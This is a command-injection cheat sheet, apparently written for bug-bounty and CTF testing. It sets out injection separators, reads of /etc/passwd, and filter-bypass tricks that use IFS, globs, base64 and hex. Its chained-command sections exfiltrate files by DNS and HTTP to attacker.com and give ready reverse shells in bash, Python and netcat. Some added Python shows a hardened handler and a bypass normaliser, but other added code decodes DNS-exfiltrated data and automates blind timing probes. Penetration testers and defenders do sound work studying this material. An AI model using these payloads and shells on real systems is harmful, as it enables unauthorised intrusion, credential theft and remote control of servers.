Detection Points
Common Vulnerable Parameters
TEXT
cmd=
exec=
command=
execute=
ping=
query=
host=
ip=
filename=
path=
file=
to=
email=
template=
Vulnerable Features
TEXT
- Ping/DNS lookup tools
- File converters (PDF, image)
- Email sending features
- Log viewers
- System information pages
- Backup/export utilities
- Network diagnostic tools
- File management systems
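What one of these features looks like when it is vulnerable, next to the hardened form. This is an added example, not code from the original page: the handler names are made up, and `echo` stands in for `ping -c 1` so the block runs offline; the injection behaves exactly the same way.

```python
import ipaddress
import re
import subprocess

# Strict hostname shape (RFC 1123 labels): no metacharacters, no leading "-".
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)

# Stand-in for the real diagnostic command (assumption: a ping tool would use
# ["ping", "-c", "1"]); echo is used here so the example needs no network.
DIAG_CMD = ["echo", "Pinging"]


def ping_vulnerable(host: str) -> str:
    """The pattern behind most 'network diagnostic' command injections: user input is
    concatenated into one string that /bin/sh parses, so ; | & && || `...` $(...) and
    newlines in `host` end the intended command and start the attacker's."""
    cmd = " ".join(DIAG_CMD) + " " + host
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout + proc.stderr


def validate_host(host: str) -> str:
    """Allow-list: an IP literal or a well-formed hostname, nothing else.
    Rejecting anything that is not a host also kills argument injection
    ("-f", "-c 100000") that argv-style execution alone would let through."""
    try:
        return str(ipaddress.ip_address(host))
    except ValueError:
        pass
    if HOSTNAME_RE.fullmatch(host):
        return host
    raise ValueError(f"rejected host value: {host!r}")


def is_valid_host(host: str) -> bool:
    try:
        validate_host(host)
        return True
    except ValueError:
        return False


def ping_hardened(host: str) -> str:
    """No shell involved: the argv list goes straight to execve, so shell
    metacharacters are just bytes inside a single argument."""
    target = validate_host(host)
    proc = subprocess.run(DIAG_CMD + [target], shell=False, capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    payload = "127.0.0.1; echo INJECTED"
    print(ping_vulnerable(payload), end="")   # second output line is INJECTED
    print("hardened accepts payload:", is_valid_host(payload))
    print(ping_hardened("127.0.0.1"), end="")
```

The fix is not escaping: `shell=False` with an argv list keeps the shell out entirely, and the allow-list handles the remaining problem (options smuggled into the first argument) that argv alone does not.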
Basic Payloads
Command Separators
BASH
; id
| id
|| id
& id
&& id
$(id)
`id`
Newline Injection
BASH
%0aid          # LF, URL-encoded
%0d%0aid       # CRLF, URL-encoded
\nid
\r\nid
Full Payloads
BASH
; cat /etc/passwd
| cat /etc/passwd
|| cat /etc/passwd
& cat /etc/passwd
&& cat /etc/passwd
`cat /etc/passwd`
$(cat /etc/passwd)
Windows-Specific
Command Separators
CMD
& dir
| dir
|| dir
&& dir
Useful Commands
CMD
dir
type flag.txt
whoami
hostname
ipconfig /all
net user
tasklist
PowerShell
POWERSHELL
; Get-Content flag.txt
| Get-ChildItem
; Invoke-Expression "whoami"
Blind Command Injection
Time-Based Detection
BASH
# Linux
; sleep 5
| sleep 5
`sleep 5`
$(sleep 5)
; ping -c 5 127.0.0.1
# Windows
& ping -n 5 127.0.0.1
| timeout 5     # often fails ("Input redirection is not supported") when cmd.exe is spawned with stdin redirected; ping is the reliable delay
Out-of-Band (OOB)
BASH
# DNS exfiltration
; nslookup attacker.com
; host attacker.com
; dig attacker.com
`nslookup $(whoami).attacker.com`
$(curl http://attacker.com/$(whoami))
# HTTP callback
; curl http://attacker.com/?c=$(whoami | base64)
; wget http://attacker.com/$(id)
$(curl http://attacker.com -d "$(cat /etc/passwd | base64 -w0)")   # quote and use -w0: unquoted, the wrapped base64 lines become separate arguments
# Burp Collaborator (use the payload host Burp gives you; current versions issue *.oastify.com names, burpcollaborator.net is the legacy domain)
; nslookup x.burpcollaborator.net
File Write Confirmation
BASH
# Write to webroot
; echo "test" > /var/www/html/test.txt
# Then check https://target.com/test.txt
Filter Bypass Techniques
Space Bypass
BASH
{cat,/etc/passwd}
cat${IFS}/etc/passwd
cat$IFS/etc/passwd
cat$IFS$9/etc/passwd
X=$'cat\x20/etc/passwd'&&$X
cat</etc/passwd
cat%09/etc/passwd # Tab (%09)
cat%0a/etc/passwd # Newline
Slash Bypass
BASH
# Environment variable (first character of PATH, which virtually always starts with /)
${PATH:0:1}etc${PATH:0:1}passwd
# → /etc/passwd
# Hex
$(printf '\x2f')etc$(printf '\x2f')passwd
Keyword Bypass
BASH
# Quote insertion
c'a't /etc/passwd
c"a"t /etc/passwd
# Backslash
c\at /etc/passwd
# Wildcards (glob), resolved by the target's shell, not by the filter
/???/?at /etc/passwd
/???/c?t /etc/passwd
# Base64
echo "Y2F0IC9ldGMvcGFzc3dk" | base64 -d | bash
# Hex (echo -e is bash/zsh; dash, Debian's /bin/sh, prints "-e" literally)
echo -e "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64" | bash
# Rev (the <<< herestring needs bash/zsh)
$(rev<<<'dwssap/cte/ tac')
Wildcard Bypass
BASH
/???/??t /???/??????
# → /bin/cat /etc/passwd, but the shell passes every other match too (/bin/cut, /etc/shadow, ...), so output is noisy
/???/b??/?at /???/p??s??
# → /usr/bin/cat /etc/passwd (tighter patterns, fewer stray matches)
Command Alternative
BASH
# Instead of cat
more /etc/passwd
less /etc/passwd
head /etc/passwd
tail /etc/passwd
tac /etc/passwd
nl /etc/passwd
xxd /etc/passwd
base64 /etc/passwd
# Instead of ls
dir
find . -type f
echo *
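Why the space and keyword bypasses above work, seen from the filter's side. This added example (not code from the original page) pairs a naive substring blacklist with a normaliser that undoes `${IFS}`, `$IFS$9`, `%09`/`%0a`, brace expansion, `$'...'` and quote/backslash splitting before matching; the blocked-term lists are assumptions standing in for whatever a real filter denies.

```python
import re
import urllib.parse
from typing import Iterable, Tuple

# Two filters of the kind the bypasses target (assumed, for illustration).
SPACE_FILTER = (" ",)          # "no whitespace allowed"
KEYWORD_FILTER = ("cat",)      # "no cat command"

_IFS = re.compile(r"\$\{IFS\}|\$IFS(?:\$\d)?")        # ${IFS}  $IFS  $IFS$9
_ANSI_C = re.compile(r"\$'([^']*)'")                  # $'cat\x20/etc/passwd'
_SPLIT = re.compile(r"(?<=\w)['\"\\]+(?=\w)")         # c'a't  c"a"t  c\at
_BRACE = re.compile(r"\{([^{}]*,[^{}]*)\}")           # {cat,/etc/passwd}


def is_blocked(value: str, blocked_terms: Iterable[str]) -> bool:
    """A substring blacklist applied to the raw input."""
    return any(term in value for term in blocked_terms)


def shell_normalize(value: str) -> str:
    """Approximate what bash will see after URL-decoding and expansion,
    so that the blacklist is matched against the command, not the disguise."""
    s = urllib.parse.unquote(value)                    # %09 -> tab, %0a -> newline
    s = _IFS.sub(" ", s)                               # $IFS expands to whitespace
    s = _ANSI_C.sub(lambda m: m.group(1).encode("latin-1").decode("unicode_escape"), s)
    s = _SPLIT.sub("", s)                              # quotes/backslashes inside a word vanish
    s = _BRACE.sub(lambda m: " ".join(m.group(1).split(",")), s)   # brace expansion
    s = re.sub(r"[\t\r\n]", " ", s)                    # any whitespace separates words
    return re.sub(r" {2,}", " ", s)


def evades(payload: str, blocked_terms: Iterable[str]) -> Tuple[bool, bool]:
    """(blocked raw, blocked after normalising). (False, True) means the bypass works
    against the naive filter and the normaliser catches it."""
    return is_blocked(payload, blocked_terms), is_blocked(shell_normalize(payload), blocked_terms)


if __name__ == "__main__":
    for payload in ("{cat,/etc/passwd}", "cat${IFS}/etc/passwd", "cat$IFS$9/etc/passwd",
                    "cat%09/etc/passwd", "X=$'cat\\x20/etc/passwd'&&$X"):
        print(f"{payload:35} space filter raw/normalised: {evades(payload, SPACE_FILTER)}")
    for payload in ("c'a't /etc/passwd", 'c"a"t /etc/passwd', "c\\at /etc/passwd"):
        print(f"{payload:35} keyword filter raw/normalised: {evades(payload, KEYWORD_FILTER)}")
```

Globs (`/???/?at`), the base64/hex/rev stages and `${PATH:0:1}` only resolve inside the target's shell, so no normaliser catches everything; treat this as a detection aid, not a fix. The fix is argv execution with allow-list validation of the parameter.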
Chained Commands
Output Redirection
BASH
; id > /dev/tcp/attacker.com/80   # /dev/tcp is a bash feature; fails when /bin/sh is dash
; bash -i >& /dev/tcp/attacker.com/4444 0>&1
Data Exfiltration
BASH
# Via DNS (xxd -p emits 60 hex chars per line, within the 63-byte label limit; chunk order relies on arrival order)
; for i in $(cat /etc/passwd | xxd -p); do nslookup $i.attacker.com; done
# Via HTTP
; curl http://attacker.com -d "$(cat /etc/passwd | base64)"
; wget --post-data="$(cat flag.txt)" http://attacker.com/
# Via Burp Collaborator
; curl https://x.burpcollaborator.net?d=$(whoami)
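Receiving side of the DNS loop above, as an added example that is not part of the original page: reassembling the hex labels from the resolver's query log into the exfiltrated file. The log lines are constructed, dnsmasq `log-queries` style, and `attacker.com` is the page's placeholder zone.

```python
import re
from typing import Iterable, List

EXFIL_DOMAIN = "attacker.com"     # placeholder from the page; your listener's zone

# Constructed sample: the first two lines of a passwd file, 30 bytes per label as
# xxd -p emits them, with one resolver retry (duplicate) and one unrelated query.
SAMPLE_DATA = b"root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"
SAMPLE_LOG = """\
Jan  1 12:00:01 dnsmasq[611]: query[A] 726f6f743a783a303a303a726f6f743a2f726f6f743a2f62696e2f626173.attacker.com from 10.0.0.5
Jan  1 12:00:01 dnsmasq[611]: query[A] 726f6f743a783a303a303a726f6f743a2f726f6f743a2f62696e2f626173.attacker.com from 10.0.0.5
Jan  1 12:00:02 dnsmasq[611]: query[A] 680a6461656d6f6e3a783a313a313a6461656d6f6e3a2f7573722f736269.attacker.com from 10.0.0.5
Jan  1 12:00:02 dnsmasq[611]: query[A] www.example.com from 10.0.0.7
Jan  1 12:00:03 dnsmasq[611]: query[A] 6E3A2F7573722F7362696E2F6E6F6C6F67696E0A.attacker.com from 10.0.0.5
"""

_QUERY = re.compile(r"query\[[A-Z]+\] (\S+) from (\S+)")


def xxd_p_lines(data: bytes, width: int = 30) -> List[str]:
    """Sender side, what `xxd -p` produces: 60 hex chars (30 bytes) per line."""
    return [data[i:i + width].hex() for i in range(0, len(data), width)]


def decode_dns_exfil(lines: Iterable[str], domain: str = EXFIL_DOMAIN) -> bytes:
    """Pull <hex>.<domain> labels out of the resolver log, in arrival order.
    Case is folded because resolvers may randomise it (0x20 encoding), and
    back-to-back identical labels are dropped because retries replay a chunk;
    a genuinely repeated chunk would be lost too, which is why a sequence
    prefix on each label is the better design for real engagements."""
    suffix = "." + domain
    chunks: List[str] = []
    last = None
    for line in lines:
        m = _QUERY.search(line)
        if not m:
            continue
        name = m.group(1).lower().rstrip(".")
        if not name.endswith(suffix):
            continue
        label = name[: -len(suffix)]
        if not re.fullmatch(r"[0-9a-f]+", label) or len(label) % 2:
            continue                                  # not one of our hex chunks
        if label == last:
            continue                                  # resolver retry
        last = label
        chunks.append(label)
    return bytes.fromhex("".join(chunks))


if __name__ == "__main__":
    print(decode_dns_exfil(SAMPLE_LOG.splitlines()).decode())
```

Cached answers are the other failure mode of the page's loop: a resolver that has already seen a label may not forward it again, so any chunk that repeats within the TTL silently disappears. A per-chunk counter in the label avoids both problems.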
Reverse Shells
Bash
BASH
; bash -i >& /dev/tcp/attacker.com/4444 0>&1
Python
BASH
# use python3 where no `python` binary exists
; python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("attacker.com",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
Netcat
BASH
; nc -e /bin/sh attacker.com 4444     # -e exists in nc.traditional and ncat only; OpenBSD nc needs the mkfifo form
; rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attacker.com 4444 >/tmp/f
Bug Bounty Tips
High-Value Targets
TEXT
- File converters (PDF, image, document)
- Network diagnostics (ping, traceroute, DNS)
- Backup/export features
- Log file viewers
- Email sending utilities
- Git/SVN integrations
- CI/CD pipelines
- Container management
Testing Strategy
TEXT
1. Test all separators: ; | || & && ` $() and newline (%0a)
2. Use time-based for blind detection
3. Try OOB with Burp Collaborator
4. Test filter bypasses systematically
5. Look for error messages revealing OS
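Steps 1, 2 and 4 of the strategy as a reusable time-based probe, added here and not code from the original page. `send` is whatever issues one request with the parameter set to a value (wrapping `requests` or `httpx` is left to the caller), so the block runs offline; the two simulated targets are constructed stand-ins for a vulnerable and a safe handler.

```python
import re
import statistics
import time
from typing import Callable, List, Tuple

# Injection contexts from the Basic Payloads / Blind Command Injection sections.
SEPARATORS = [";", "|", "||", "&", "&&", "\n"]
WRAPPERS = ["$({cmd})", "`{cmd}`"]


def build_time_payloads(base: str, delay: float, delay_cmd: str = "sleep {d}") -> List[str]:
    """base is the parameter's normal value (e.g. 127.0.0.1). delay_cmd is the
    sleeping command; pass 'ping -n {d} 127.0.0.1' for Windows targets."""
    cmd = delay_cmd.format(d=delay)
    payloads = [f"{base}{sep} {cmd}" for sep in SEPARATORS]
    payloads += [f"{base} {w.format(cmd=cmd)}" for w in WRAPPERS]
    return payloads


def timed(send: Callable[[str], object], value: str) -> float:
    t0 = time.perf_counter()
    send(value)
    return time.perf_counter() - t0


def detect_time_based(send: Callable[[str], object], base: str, delay: float = 5.0,
                      repeats: int = 3, delay_cmd: str = "sleep {d}") -> List[Tuple[str, float]]:
    """Baseline = median of `repeats` normal requests; a payload is a hit when it
    takes longer than baseline + 0.8*delay and does so again on a confirming
    request (one slow response is jitter, two in a row is the sleep).
    Note that `||` only fires if the preceding command fails and `&&` only if it
    succeeds, so not every separator will hit even on a vulnerable target."""
    baseline = statistics.median(timed(send, base) for _ in range(repeats))
    threshold = baseline + 0.8 * delay
    hits = []
    for payload in build_time_payloads(base, delay, delay_cmd):
        elapsed = timed(send, payload)
        if elapsed >= threshold and timed(send, payload) >= threshold:
            hits.append((payload, round(elapsed, 3)))
    return hits


# --- constructed targets so the probe can be exercised without a network ---
_SLEEP = re.compile(r"(?:^|[;|&\n`(])\s*sleep\s+([\d.]+)")


def simulated_vulnerable(value: str) -> None:
    """Stands in for sh -c 'ping -c 1 ' + value: honours an injected sleep."""
    m = _SLEEP.search(value)
    if m:
        time.sleep(float(m.group(1)))


def simulated_safe(value: str) -> None:
    """Stands in for execve(["ping", "-c", "1", value]): nothing executes."""
    time.sleep(0.01)


if __name__ == "__main__":
    # Short delay for the demo; use 5 or more against a real target over a network.
    for name, target in (("vulnerable", simulated_vulnerable), ("safe", simulated_safe)):
        print(name, detect_time_based(target, "127.0.0.1", delay=0.15, repeats=2))
```

Against a live target prefer a longer delay (the page's 5 s) and more baseline samples; a 0.8*delay threshold tolerates slow but steady links, while the confirming request keeps one congested response from becoming a finding.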
Report Impact
TEXT
- Prove code execution with harmless commands (hostname, id, whoami)
- Demonstrate data access (e.g. /etc/passwd, application configuration)
- Chain with other vulnerabilities
Automation
commix
BASH
# Basic detection
commix -u "https://target.com/?ip=127.0.0.1"
# POST request
commix -u "https://target.com/" --data="ip=127.0.0.1"
# Specific technique
commix -u "URL" --technique=T # Time-based
# Get shell
commix -u "URL" --os-shell